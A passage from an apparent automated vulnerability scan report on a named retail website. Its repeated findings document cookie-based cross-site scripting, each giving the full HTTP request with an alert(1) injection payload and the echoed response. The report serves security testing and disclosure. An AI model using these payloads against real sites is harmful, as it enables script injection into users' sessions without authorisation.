Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /department/sports-and-duffels HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C83a31'%3balert(1)//4d05bbfeabd; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:09:04 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:09:04 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 70582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|83a31';alert(1)//4d05bbfeabd');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.62. http://www.ebags.com/department/travel-accessories [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/travel-accessories

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 521a0'%3balert(1)//e78acb8c688 was submitted in the SPLITSESSION cookie. This input was echoed as 521a0';alert(1)//e78acb8c688 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /department/travel-accessories HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C521a0'%3balert(1)//e78acb8c688; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:08:59 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:08:59 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 72403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|521a0';alert(1)//e78acb8c688');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.63. http://www.ebags.com/department/wallets-and-accessories [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/wallets-and-accessories

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48e43'%3balert(1)//f8f1500fa15 was submitted in the SPLITSESSION cookie. This input was echoed as 48e43';alert(1)//f8f1500fa15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /department/wallets-and-accessories HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C48e43'%3balert(1)//f8f1500fa15; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:08:57 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:08:57 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|48e43';alert(1)//f8f1500fa15');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.64. http://www.ebags.com/help/ [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/help/

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23d8c'%3balert(1)//86e4ede313a was submitted in the SPLITSESSION cookie. This input was echoed as 23d8c';alert(1)//86e4ede313a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /help/ HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C23d8c'%3balert(1)//86e4ede313a; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:05:18 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:05:18 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 47097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|23d8c';alert(1)//86e4ede313a');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.65. http://www.ebags.com/help/index.cfm [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/help/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa928'%3balert(1)//fd765d25104 was submitted in the SPLITSESSION cookie. This input was echoed as fa928';alert(1)//fd765d25104 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /help/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cfa928'%3balert(1)//fd765d25104; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

1.66. http://www.ebags.com/info/Compare/index.cfm [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/info/Compare/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38804'%3balert(1)//6fc875325e3 was submitted in the SPLITSESSION cookie. This input was echoed as 38804';alert(1)//6fc875325e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /info/Compare/index.cfm?fuseaction=chart&similarchart=120830 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C38804'%3balert(1)//6fc875325e3; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:19:26 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:19:26 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 56217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|38804';alert(1)//6fc875325e3');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.67. http://www.ebags.com/info/Compare/index.cfm [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/info/Compare/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5278b'%3balert(1)//284b3efccf0 was submitted in the SPLITSESSION cookie. This input was echoed as 5278b';alert(1)//284b3efccf0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /info/Compare/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C5278b'%3balert(1)//284b3efccf0; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:18:56 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:18:56 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 74993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|5278b';alert(1)//284b3efccf0');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.68. http://www.ebags.com/members/index.cfm [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/members/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82ed8'%3balert(1)//b6b1b7aa098 was submitted in the SPLITSESSION cookie. This input was echoed as 82ed8';alert(1)//b6b1b7aa098 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /members/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C82ed8'%3balert(1)//b6b1b7aa098; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:44 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:03:44 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 45788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|82ed8';alert(1)//b6b1b7aa098');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.69. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/product/case-logic/sony-psp-game-case/120830

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5aad'%3balert(1)//8dbc73dd980 was submitted in the SPLITSESSION cookie. This input was echoed as b5aad';alert(1)//8dbc73dd980 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /product/case-logic/sony-psp-game-case/120830 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7Cb5aad'%3balert(1)//8dbc73dd980; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:17 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:03:17 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 75685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','BECOME01$COUPONID=40959822');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|b5aad';alert(1)//8dbc73dd980');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.70. http://www.ebags.com/products/index.cfm [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/products/index.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 572d1'%3balert(1)//35c9cbd0d5 was submitted in the SPLITSESSION cookie. This input was echoed as 572d1';alert(1)//35c9cbd0d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /products/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C572d1'%3balert(1)//35c9cbd0d5; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:17:56 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:17:56 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 74990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<script type="text/javascript">
FSR.CPPS.set('SourceID','XSEOGOOG01');
FSR.CPPS.set('Splitsession','STT=ST1|TAT=TT2|572d1';alert(1)//35c9cbd0d5');
FSR.CPPS.set('IPAddress','174.121.222.18');
</script>
...[SNIP]...

1.71. http://www.ebags.com/products/view/ZoomColorsViews.cfm [SPLITSESSION cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/products/view/ZoomColorsViews.cfm

Issue detail

The value of the SPLITSESSION cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40fea'%3balert(1)//640b3c4d3a9 was submitted in the SPLITSESSION cookie. This input was echoed as 40fea';alert(1)//640b3c4d3a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

